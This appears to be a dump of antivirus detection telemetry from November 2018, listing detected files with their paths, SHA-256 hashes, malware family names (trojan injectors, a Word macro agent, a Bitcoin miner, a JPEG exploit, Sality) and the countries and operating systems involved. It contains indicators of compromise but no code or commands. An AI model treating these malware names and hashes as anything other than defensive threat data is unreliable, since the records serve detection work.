  Row(detection=Row(filename='avscan-20181102-175053-af8ede12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b75b2a24\\AVSCAN-20181102-171048-3B26D367\\AVSCAN-20181102-175053-AF8EDE12', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:50:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061906-2bd5c9a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061906-2BD5C9A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Compressed\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Compressed\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:34:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:08:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\HTTPERR\\msiexec64.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T16:44:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052425-886cf80e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052425-886CF80E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053558-25599c3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053558-25599C3C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052158-309aa946', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052158-309AA946', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062054-6c63546a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062054-6C63546A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052103-0ff05fab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052103-0FF05FAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062159-9321afaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062159-9321AFAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053628-379547c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053628-379547C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062533-12e7239b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062533-12E7239B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061150-2842d273', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061150-2842D273', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051407-181ecd9d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051407-181ECD9D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051335-05167790', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051335-05167790', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062042-65396dab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062042-65396DAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055023-28d14991', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055023-28D14991', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054937-0de6c747', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054937-0DE6C747', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060702-7c490411', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060702-7C490411', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051045-9f728480', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051045-9F728480', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052309-5b23d539', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052309-5B23D539', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051015-8df1f916', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051015-8DF1F916', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051305-f317d842', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051305-F317D842', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054014-be04fa23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054014-BE04FA23', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061022-f37afcb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061022-F37AFCB1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054705-b350e34e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054705-B350E34E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060046-9ca8158e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060046-9CA8158E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053022-5d2dedea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053022-5D2DEDEA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051145-c34e4f16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051145-C34E4F16', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062252-b2f5ae87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062252-B2F5AE87', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:48:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055824-4782b599', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055824-4782B599', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061519-a50388e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061519-A50388E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T22:07:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062456-fcfced0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062456-FCFCED0F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050821-499067fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050821-499067FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='7e7c848bdfccc117e8230ca8a658e73eee01b2ae6d205ef455e396a99d1d3ad7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T15:33:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062310-bd6ff371', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062310-BD6FF371', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051433-277a0eed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051433-277A0EED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='package_764_xml.js.zip', filepath='C:\\dasi\\LwX\\server\\DConcept\\HtmlHelp\\XCONCEPT_HILFE\\WHXDATA\\PACKAGE_764_XML.JS.zip', filesize=4000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='8172c85bfccbdf9b8fcf165c6ad31824535fc0ab9e28364d55d6fd67f60572d8', metadata=Row(cmdline='C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Documents\\\\\\\\PersBackup\\\\\\\\dasi.buj \\\\\\/force \\\\\\/speed:fast \\\\\\/mode:full', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Personal Backup 5\\Persbackup.exe', parentsize=10769920, timestamp='2018-11-02T23:18:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:22:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054339-380a663e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054339-380A663E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053349-d8a91f4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053349-D8A91F4D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053439-f63c5183', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053439-F63C5183', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054126-e93baccd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054126-E93BACCD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055715-1edf4ed0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055715-1EDF4ED0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060932-d5be8bca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060932-D5BE8BCA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062300-b7a54694', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062300-B7A54694', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060750-996bd7d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060750-996BD7D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:44:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054412-4be6ac35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054412-4BE6AC35', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-155830-db1b5fce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155830-DB1B5FCE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T20:08:53Z'), dt=datetime.date(2018, 11, 1)),
